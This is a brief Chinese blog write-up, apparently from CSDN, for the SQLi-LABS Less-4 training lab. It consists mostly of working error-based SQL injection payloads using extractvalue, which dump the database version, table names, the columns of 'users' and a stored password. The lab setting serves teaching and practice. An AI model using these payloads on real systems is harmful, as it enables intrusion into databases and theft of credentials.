[SQLi-LABS] Less-4

本文探讨了双引号变形字符型注入攻击方法,通过修改GET参数中的双引号进行SQL注入,演示了如何利用extractvalue函数爆表、爆字段及爆内容,对网站安全防护提出了挑战。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

双引号变形字符型注入 ,其余与题三相同

/Less-4/?id=1")--+
 /Less-4/?id=1")and extractvalue(1, concat(0x7e, (select version()),0x7e))--+
 /Less-4/?id=1") and extractvalue(1, concat('~',(select group_concat(table_name) from information_schema.tables where table_schema=database()),'~'))--+  //爆表
 /Less-4/?id=1") and extractvalue(1, concat('~',(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),'~'))--+  //爆字段
 /Less-4/?id=1") and extractvalue(1,concat('~',(select password from users limit 0,1),'~'))--+  //爆内容
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值